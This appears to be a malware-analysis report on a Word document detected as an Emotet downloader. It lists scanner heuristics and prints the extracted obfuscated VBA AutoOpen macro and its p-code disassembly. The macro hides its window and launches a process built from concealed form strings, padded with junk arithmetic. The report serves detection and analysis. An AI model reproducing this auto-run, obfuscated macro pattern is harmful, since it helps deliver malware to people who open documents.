MALICIOUS
190
Risk Score
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6901578-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6901578-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set DkAXAB = GetObject(JXZkGG.KAAZDc) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15739 bytes |
SHA-256: ebffa6bdb48dcaa1c67f4c2f40a810acd3aa71f42a562c2ca78f94425908931c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "bABkAAkc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "JXZkGG"
Attribute VB_Base = "0{C9E4D484-7ED1-4A9E-8AAA-FB4049FFACCA}{C13D5912-867D-4FBC-AF1A-A4B137E70440}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "JwUAAQUA"
Sub autoopen()
On Error Resume Next
If QoQAAU = FCUQoQx Then
ZA4AXAc = 740148012 * Hex(388608128) / 819101861 + Sqr(796073623) * 74742867 / CInt(683722712) * (198858864 * 195522963)
SBAwADU = (585059973 - Chr(E4AZAU4A) / FkQQQA / 872647629 + VAZDAX_ / Fix(385129007 + Log(coBAAAA * Sgn(943410672) + SD_4kDwx / CSng(263917989))))
End If
If ZAxoAxcD = kAcUC4 Then
YXBBXQw = 390307595 * Hex(487326228) / 213075158 + Sqr(390577833) * 549641298 / CInt(717307618) * (253728359 * 230103812)
nAAUAC = (632918236 - Chr(EoQxocDo) / TA4ZGAZQ / 974843141 + XCBQXQU / Fix(808848458 + Log(wZUAAB * Sgn(462879650) + XAUAQAA / CSng(560205990))))
End If
If RADDAB = KGZAUk_ Then
I1cADB4 = 374509441 * Hex(927386870) / 939820167 + Sqr(651645585) * 754383024 / CInt(442710205) * (138859583 * 480312107)
rDAGAw = (930798243 - Chr(z_GxxUA_) / VQAAZc / 717000136 + tAQxAU1k / Fix(5581353 + Log(EAQ1okGA * Sgn(934042976) + wU1ABB_ / CSng(662376054))))
End If
Set DkAXAB = GetObject(JXZkGG.KAAZDc)
If iA1Uoo4 = QAoQx4 Then
w4_oABU_ = 523199817 * Hex(499557812) / 548069906 + Sqr(806870675) * 607474438 / CInt(695773955) * (540521087 * 532145967)
MABAA1 = (732678661 - Chr(wCZXDG) / icGBBBC / 371866974 + dA4XDQ / Fix(874653699 + Log(LQCXAU_Q * Sgn(537789196) + JAwwCQ / CSng(582829857))))
End If
If wZQckABo = pQGAAA Then
WUUwQBC = 636248740 * Hex(297540682) / 22869338 + Sqr(696039598) * 779730060 / CInt(159590812) * (134932439 * 195806744)
aQAAwAA = (103566581 - Chr(z_BAAwxB) / nUwxZD / 561802303 + rGAAQUAA / Fix(271671226 + Log(UkUAcXUU * Sgn(266035210) + dCGoQA / CSng(782421513))))
End If
If IcUAAw = zkZQxAxG Then
wBQQ_AA1 = 73388702 * Hex(706924395) / 189789370 + Sqr(328632967) * 893819377 / CInt(892671759) * (86331909 * 889325534)
cAB_AAUB = (529018291 - Chr(NXBZAU) / UQCAAA4 / 544686683 + jUAAxk / Fix(260848049 + Log(K1DAw1A * Sgn(820579750) + rDZwDx_ / CSng(584442863))))
End If
DkAXAB.ShowWindow = 34847 - 34847
If rAAAAA = OcDAxA Then
HX_A_xA = 268356235 * Hex(943096616) / 863510668 + Sqr(311037146) * 61100493 / CInt(121554886) * (577288932 * 841262464)
uZDADAA = (297829257 - Chr(hDZx4AA) / SA4AAZw / 561269094 + zUAGQk / Fix(763920411 + Log(oBAcUZQX * Sgn(437270093) + WAQAAQ1G / CSng(730724163))))
End If
If NAwwAxA = fCAwAUUC Then
mAUcXC1o = 837060003 * Hex(228383076) / 646016853 + Sqr(151558691) * 671928390 / CInt(417188366) * (52432892 * 42983134)
YAUADx = (562873880 - Chr(IAB4Ax) / qBDx1ZkA / 73227912 + OAXxkD_ / Fix(383300184 + Log(PGAUoAAc * Sgn(637861944) + WAA_Qx / CSng(183742566))))
End If
If TQXAXBBQ = B4Ao4ACw Then
PQBXAw = 24443602 * Hex(454943240) / 834026292 + Sqr(708148475) * 163566224 / CInt(205525391) * (981523969 * 696999494)
hDoXAQX = (579943260 - Chr(DQoGXA) / i4AxZcA / 394101855 + rB4_ADAB / Fix(345397091 + Log(n4AAUAZB * Sgn(149652622) + zAkUBA / CSng(604959696))))
End If
GetObject(JXZkGG.aCZAkCD). _
Create# FkQAZUUo + JXZkGG.vwAZAAGA + sxAABoA + JXZkGG.a_DAAcCA + oUwAGA + JXZkGG.KAxAQA4 + MADBAAD, vGxQUcBD, DkAXAB, kkUUA4BD
If nQkCBxAG = dABCAAAU Then
tCAAc1A_ = 837316285 * Hex(921431771) / 134830364 + Sqr(385449817) * 53325057 / CInt(746166708) * (383460613 * 107103266)
mAAUcB = (428618010 - Chr(YACQAQXB) / KCBB1B / 340291954 + iDBUcA / Fix(647037553 + Log(JcG_AAG * Sgn(421305681) + LBoABBC / CSng(376620037))))
End If
If jB_ZAwBk = bAGAUUA Then
TADQ1AGG = 171593113 * Hex(325320704) / 768956617 + Sqr(192028052) * 285368658 / CInt(614248241) * (311309917 * 867208943)
Z1_GUGAX = (476145553 - Chr(n4AAAco) / JwAQUACA / 234037785 + dCABZ_U / Fix(440480583 + Log(FA1XUUA * Sgn(41986097) + W4cZABC / CSng(278887116))))
End If
If ZGAQ41C = qkDQA_AA Then
pBAAAAC = 960532783 * Hex(796463753) / 966009341 + Sqr(60907982) * 430362508 / CInt(632328324) * (975199089 * 684655257)
ucUUAXkZ = (299083116 - Chr(T1AQAQZ) / SkxGAk / 717059084 + YkBXAAA / Fix(67356010 + Log(hABZAAB * Sgn(507737656) + kB_XA_ / CSng(796030496))))
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/9203284fdee9496390a9d1e1770e35ea.bin
' ===============================================================================
' Module streams:
' Macros/VBA/bABkAAkc - 1106 bytes
' Macros/VBA/JXZkGG - 1157 bytes
' Macros/VBA/JwUAAQUA - 7014 bytes
' Line #0:
' FuncDefn (Sub JwUAAQUA())
' Line #1:
' OnError (Resume Next)
' Line #2:
' Ld autoopen
' Ld QoQAAU
' Eq
' IfBlock
' Line #3:
' LitDI4 0xC32C 0x2C1D
' LitDI4 0xB080 0x1729
' ArgsLd Hex 0x0001
' Mul
' LitDI4 0x80A5 0x30D2
' Div
' LitDI4 0x1E97 0x2F73
' ArgsLd Sqr 0x0001
' LitDI4 0x7C53 0x0474
' Mul
' LitDI4 0xC7D8 0x28C0
' Coerce (Int)
' Div
' LitDI4 0x5870 0x0BDA
' LitDI4 0x7193 0x0BA7
' Mul
' Paren
' Mul
' Add
' St FCUQoQx
' Line #4:
' LitDI4 0x4E85 0x22DF
' Ld SBAwADU
' ArgsLd Chr 0x0001
' Ld E4AZAU4A
' Div
' LitDI4 0x8BCD 0x3403
' Div
' Sub
' Ld FkQQQA
' LitDI4 0x9A2F 0x16F4
' Ld VAZDAX_
' LitDI4 0x4DF0 0x383B
' FnSgn
' Mul
' Ld coBAAAA
' LitDI4 0x11A5 0x0FBB
' Coerce (Sng)
' Div
' Add
' ArgsLd Log 0x0001
' Add
' FnFix
' Div
' Add
' Paren
' St ZA4AXAc
' Line #5:
' EndIfBlock
' Line #6:
' Ld SD_4kDwx
' Ld ZAxoAxcD
' Eq
' IfBlock
' Line #7:
' LitDI4 0x9F0B 0x1743
' LitDI4 0x0214 0x1D0C
' ArgsLd Hex 0x0001
' Mul
' LitDI4 0x44D6 0x0CB3
' Div
' LitDI4 0xBEA9 0x1747
' ArgsLd Sqr 0x0001
' LitDI4 0xDC52 0x20C2
' Mul
' LitDI4 0x3EE2 0x2AC1
' Coerce (Int)
' Div
' LitDI4 0x9667 0x0F1F
' LitDI4 0x1B04 0x0DB7
' Mul
' Paren
' Mul
' Add
' St kAcUC4
' Line #8:
' LitDI4 0x90DC 0x25B9
' Ld nAAUAC
' ArgsLd Chr 0x0001
' Ld EoQxocDo
' Div
' LitDI4 0xED05 0x3A1A
' Div
' Sub
' Ld TA4ZGAZQ
' LitDI4 0x0C4A 0x3036
' Ld XCBQXQU
' LitDI4 0xFBA2 0x1B96
' FnSgn
' Mul
' Ld wZUAAB
' LitDI4 0x10A6 0x2164
' Coerce (Sng)
' Div
' Add
' ArgsLd Log 0x0001
' Add
' FnFix
' Div
' Add
' Paren
' St YXBBXQw
' Line #9:
' EndIfBlock
' Line #10:
' Ld XAUAQAA
' Ld RADDAB
' Eq
' IfBlock
' Line #11:
' LitDI4 0x8F81 0x1652
' LitDI4 0xCCF6 0x3746
' ArgsLd Hex 0x0001
' Mul
' LitDI4 0x8487 0x3804
' Div
' LitDI4 0x5291 0x26D7
' ArgsLd Sqr 0x0001
' LitDI4 0xF8B0 0x2CF6
' Mul
' LitDI4 0x38BD 0x1A63
' Coerce (Int)
' Div
' LitDI4 0xD43F 0x0846
' LitDI4 0xFB2B 0x1CA0
' Mul
' Paren
' Mul
' Add
' St KGZAUk_
' Line #12:
' LitDI4 0xDAA3 0x377A
' Ld rDAGAw
' ArgsLd Chr 0x0001
' Ld z_GxxUA_
' Div
' LitDI4 0x8DC8 0x2ABC
' Div
' Sub
' Ld VQAAZc
' LitDI4 0x2A29 0x0055
' Ld tAQxAU1k
' LitDI4 0x5D60 0x37AC
' FnSgn
' Mul
' Ld EAQ1okGA
' LitDI4 0x0E76 0x277B
' Coerce (Sng)
' Div
' Add
' ArgsLd Log 0x0001
' Add
' FnFix
' Div
' Add
' Paren
' St I1cADB4
' Line #13:
' EndIfBlock
' Line #14:
' SetStmt
' Ld MSForms
' MemLd GetObject
' ArgsLd DkAXAB 0x0001
' Set wU1ABB_
' Line #15:
' Ld KAAZDc
' Ld iA1Uoo4
' Eq
' IfBlock
' Line #16:
' LitDI4 0x6549 0x1F2F
' LitDI4 0xA5B4 0x1DC6
' ArgsLd Hex 0x0001
' Mul
' LitDI4 0xE212 0x20AA
' Div
' LitDI4 0xDE93 0x3017
' ArgsLd Sqr 0x0001
' LitDI4 0x5306 0x2435
' Mul
' LitDI4 0xAB03 0x2978
' Coerce (Int)
' Div
' LitDI4 0xB27F 0x2037
' LitDI4 0xE72F 0x1FB7
' Mul
' Paren
' Mul
' Add
' St QAoQx4
' Line #17:
' LitDI4 0xCA05 0x2BAB
' Ld MABAA1
' ArgsLd Chr 0x0001
' Ld wCZXDG
' Div
' LitDI4 0x3D5E 0x162A
' Div
' Sub
' Ld icGBBBC
' LitDI4 0x2803 0x3422
' Ld dA4XDQ
' LitDI4 0x030C 0x200E
' FnSgn
' Mul
' Ld LQCXAU_Q
' LitDI4 0x4721 0x22BD
' Coerce (Sng)
' Div
' Add
' ArgsLd Log 0x0001
' Add
' FnFix
' Div
' Add
' Paren
' St w4_oABU_
' Line #18:
' EndIfBlock
' Line #19:
' Ld JAwwCQ
' Ld wZQckABo
' Eq
' IfBlock
' Line #20:
' LitDI4 0x62A4 0x25EC
' LitDI4 0x1C4A 0x11BC
' ArgsLd Hex 0x0001
' Mul
' LitDI4 0xF55A 0x015C
' Div
' LitDI4 0xB8AE 0x297C
' ArgsLd Sqr 0x0001
' LitDI4 0xBC8C 0x2E79
' Mul
' LitDI4 0x299C 0x0983
' Coerce (Int)
' Div
' LitDI4 0xE7D7 0x080A
' LitDI4 0xC618 0x0BAB
' Mul
' Paren
' Mul
' Add
' St pQGAAA
' Line #21:
' LitDI4 0x4CF5 0x062C
' Ld aQAAwAA
' ArgsLd Chr 0x0001
' Ld z_BAAwxB
' Div
' LitDI4 0x6C3F 0x217C
' Div
' Sub
' Ld nUwxZD
' LitDI4 0x5FBA 0x1031
' Ld rGAAQUAA
' LitDI4 0x600A 0x0FDB
' FnSgn
' Mul
' Ld UkUAcXUU
' LitDI4 0xCE09 0x2EA2
' Coerce (Sng)
' Div
' Add
' ArgsLd Log 0x0001
' Add
' FnFix
' Div
' Add
' Paren
' St WUUwQBC
' Line #22:
' EndIfBlock
' Line #23:
' Ld dCGoQA
' Ld IcUAAw
' Eq
' IfBlock
' Line #24:
' LitDI4 0xD29E 0x045F
' LitDI4 0xCF6B 0x2A22
' ArgsLd Hex 0x0001
' Mul
' LitDI4 0xF4BA 0x0B4F
' Div
' LitDI4 0x8A87 0x1396
' ArgsLd Sqr 0x0001
' LitDI4 0x99F1 0x3546
' Mul
' LitDI4 0x170F 0x3535
' Coerce (Int)
' Div
' LitDI4 0x5205 0x0525
' LitDI4 0x07DE 0x3502
' Mul
' Paren
' Mul
' Add
' St zkZQxAxG
' Line #25:
' LitDI4 0x2DB3 0x1F88
' Ld cAB_AAUB
' ArgsLd Chr 0x0001
' Ld NXBZAU
' Div
' LitDI4 0x425B 0x2077
' Div
' Sub
' Ld UQCAAA4
' LitDI4 0x39B1 0x0F8C
' Ld jUAAxk
' LitDI4 0x0DA6 0x30E9
' FnSgn
' Mul
' Ld K1DAw1A
' LitDI4 0xE3EF 0x22D5
' Coerce (Sng)
' Div
' Add
' ArgsLd Log 0x0001
' Add
' FnFix
' Div
' Add
' Paren
' St wBQQ_AA1
' Line #26:
' EndIfBlock
' Line #27:
' LitDI4 0x881F 0x0000
' LitDI4 0x881F 0x0000
' Sub
' Ld wU1ABB_
' MemSt rDZwDx_
' Line #28:
' Ld ShowWindow
' Ld rAAAAA
' Eq
' IfBlock
' Line #29:
' LitDI4 0xCA8B 0x0FFE
' LitDI4 0x8328 0x3836
' ArgsLd Hex 0x0001
' Mul
' LitDI4 0x208C 0x3378
' Div
' LitDI4 0x0CDA 0x128A
' ArgsLd Sqr 0x0001
' LitDI4 0x51CD 0x03A4
' Mul
' LitDI4 0xC7C6 0x073E
' Coerce (Int)
' Div
' LitDI4 0xBAE4 0x2268
' LitDI4 0xA580 0x3224
' Mul
' Paren
' Mul
' Add
' St OcDAxA
' Line #30:
' LitDI4 0x8389 0x11C0
' Ld uZDADAA
' ArgsLd Chr 0x0001
' Ld hDZx4AA
' Div
' LitDI4 0x4966 0x2174
' Div
' Sub
' Ld SA4AAZw
' LitDI4 0x801B 0x2D88
' Ld zUAGQk
' LitDI4 0x364D 0x1A10
' FnSgn
' Mul
' Ld oBAcUZQX
' LitDI4 0xF743 0x2B8D
' Coerce (Sng)
' Div
' Add
' ArgsLd Log 0x0001
' Add
' FnFix
' Div
' Add
' Paren
' St HX_A_xA
' Line #31:
' EndIfBlock
' Line #32:
' Ld WAQAAQ1G
' Ld NAwwAxA
' Eq
' IfBlock
' Line #33:
' LitDI4 0x85A3 0x31E4
' LitDI4 0xD964 0x0D9C
' ArgsLd Hex 0x0001
' Mul
' LitDI4 0x6F55 0x2681
' Div
' LitDI4 0x9A23 0x0908
' ArgsLd Sqr 0x0001
' LitDI4 0xD046 0x280C
' Mul
' LitDI4 0xCA0E 0x18DD
' Coerce (Int)
' Div
' LitDI4 0x0FFC 0x0320
' LitDI4 0xDEDE 0x028F
' Mul
' Paren
' Mul
' Add
' St fCAwAUUC
' Line #34:
' LitDI4 0xC618 0x218C
' Ld YAUADx
' ArgsLd Chr 0x0001
' Ld IAB4Ax
' Div
' LitDI4 0x5E88 0x045D
' Div
' Sub
' Ld qBDx1ZkA
' LitDI4 0xB258 0x16D8
' Ld OAXxkD_
' LitDI4 0x0038 0x2605
' FnSgn
' Mul
' Ld PGAUoAAc
' LitDI4 0xB066 0x0AF3
' Coerce (Sng)
' Div
' Add
' ArgsLd Log 0x0001
' Add
' FnFix
' Div
' Add
' Paren
' St mAUcXC1o
' Line #35:
' EndIfBlock
' Line #36:
' Ld WAA_Qx
' Ld TQXAXBBQ
' Eq
' IfBlock
' Line #37:
' LitDI4 0xFAD2 0x0174
' LitDI4 0xE208 0x1B1D
' ArgsLd Hex 0x0001
' Mul
' LitDI4 0x3B34 0x31B6
' Div
' LitDI4 0x7CFB 0x2A35
' ArgsLd Sqr 0x0001
' LitDI4 0xD290 0x09BF
' Mul
' LitDI4 0x118F 0x0C40
' Coerce (Int)
' Div
' LitDI4 0xDE01 0x3A80
' LitDI4 0x5E46 0x298B
' Mul
' Paren
' Mul
' Add
' St B4Ao4ACw
' Line #38:
' LitDI4 0x3B5C 0x2291
' Ld hDoXAQX
' ArgsLd Chr 0x0001
' Ld DQoGXA
' Div
' LitDI4 0x845F 0x177D
' Div
' Sub
' Ld i4AxZcA
' LitDI4 0x5763 0x1496
' Ld rB4_ADAB
' LitDI4 0x848E 0x08EB
' FnSgn
' Mul
' Ld n4AAUAZB
' LitDI4 0xF3D0 0x240E
' Coerce (Sng)
' Div
' Add
' ArgsLd Log 0x0001
' Add
' FnFix
' Div
' Add
' Paren
' St PQBXAw
' Line #39:
' EndIfBlock
' Line #40:
' LineCont 0x0004 07 00 00 00
' Ld Create
' Ld MSForms
' MemLd FkQAZUUo
' Add
' Ld vwAZAAGA
' Add
' Ld MSForms
' MemLd sxAABoA
' Add
' Ld a_DAAcCA
' Add
' Ld MSForms
' MemLd oUwAGA
' Add
' Ld KAxAQA4
' Add
' Ld MADBAAD
' Ld wU1ABB_
' Ld vGxQUcBD
' Ld MSForms
' MemLd zAkUBA
' ArgsLd DkAXAB 0x0001
' ArgsMemCall aCZAkCD# 0x0004
' Line #41:
' Ld kkUUA4BD
' Ld nQkCBxAG
' Eq
' IfBlock
' Line #42:
' LitDI4 0x6EBD 0x31E8
' LitDI4 0xEEDB 0x36EB
' ArgsLd Hex 0x0001
' Mul
' LitDI4 0x591C 0x0809
' Div
' LitDI4 0x7F59 0x16F9
' ArgsLd Sqr 0x0001
' LitDI4 0xAD01 0x032D
' Mul
' LitDI4 0x99B4 0x2C79
' Coerce (Int)
' Div
' LitDI4 0x2505 0x16DB
' LitDI4 0x4422 0x0662
' Mul
' Paren
' Mul
' Add
' St dABCAAAU
' Line #43:
' LitDI4 0x311A 0x198C
' Ld mAAUcB
' ArgsLd Chr 0x0001
' Ld YACQAQXB
' Div
' LitDI4 0x7172 0x1448
' Div
' Sub
' Ld KCBB1B
' LitDI4 0x0271 0x2691
' Ld iDBUcA
' LitDI4 0x9D51 0x191C
' FnSgn
' Mul
' Ld JcG_AAG
' LitDI4 0xC405 0x1672
' Coerce (Sng)
' Div
' Add
' ArgsLd Log 0x0001
' Add
' FnFix
' Div
' Add
' Paren
' St tCAAc1A_
' Line #44:
' EndIfBlock
' Line #45:
' Ld LBoABBC
' Ld jB_ZAwBk
' Eq
' IfBlock
' Line #46:
' LitDI4 0x4D99 0x0A3A
' LitDI4 0x0000 0x1364
' ArgsLd Hex 0x0001
' Mul
' LitDI4 0x58C9 0x2DD5
' Div
' LitDI4 0x1D94 0x0B72
' ArgsLd Sqr 0x0001
' LitDI4 0x6152 0x1102
' Mul
' LitDI4 0xAF31 0x249C
' Coerce (Int)
' Div
' LitDI4 0x365D 0x128E
' LitDI4 0x8EEF 0x33B0
' Mul
' Paren
' Mul
' Add
' St bAGAUUA
' Line #47:
' LitDI4 0x6791 0x1C61
' Ld Z1_GUGAX
' ArgsLd Chr 0x0001
' Ld n4AAAco
' Div
' LitDI4 0x2219 0x0DF3
' Div
' Sub
' Ld JwAQUACA
' LitDI4 0x3347 0x1A41
' Ld dCABZ_U
' LitDI4 0xA831 0x0280
' FnSgn
' Mul
' Ld FA1XUUA
' LitDI4 0x7ACC 0x109F
' Coerce (Sng)
' Div
' Add
' ArgsLd Log 0x0001
' Add
' FnFix
' Div
' Add
' Paren
' St TADQ1AGG
' Line #48:
' EndIfBlock
' Line #49:
' Ld W4cZABC
' Ld ZGAQ41C
' Eq
' IfBlock
' Line #50:
' LitDI4 0x912F 0x3940
' LitDI4 0x1289 0x2F79
' ArgsLd Hex 0x0001
' Mul
' LitDI4 0x21FD 0x3994
' Div
' LitDI4 0x61CE 0x03A1
' ArgsLd Sqr 0x0001
' LitDI4 0xCF8C 0x19A6
' Mul
' LitDI4 0x9084 0x25B0
' Coerce (Int)
' Div
' LitDI4 0x5B71 0x3A20
' LitDI4 0x0299 0x28CF
' Mul
' Paren
' Mul
' Add
' St qkDQA_AA
' Line #51:
' LitDI4 0xA56C 0x11D3
' Ld ucUUAXkZ
' ArgsLd Chr 0x0001
' Ld T1AQAQZ
' Div
' LitDI4 0x740C 0x2ABD
' Div
' Sub
' Ld SkxGAk
' LitDI4 0xC56A 0x0403
' Ld YkBXAAA
' LitDI4 0x7638 0x1E43
' FnSgn
' Mul
' Ld hABZAAB
' LitDI4 0x7620 0x2F72
' Coerce (Sng)
' Div
' Add
' ArgsLd Log 0x0001
' Add
' FnFix
' Div
' Add
' Paren
' St pBAAAAC
' Line #52:
' EndIfBlock
' Line #53:
' EndSub
' Line #54:
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.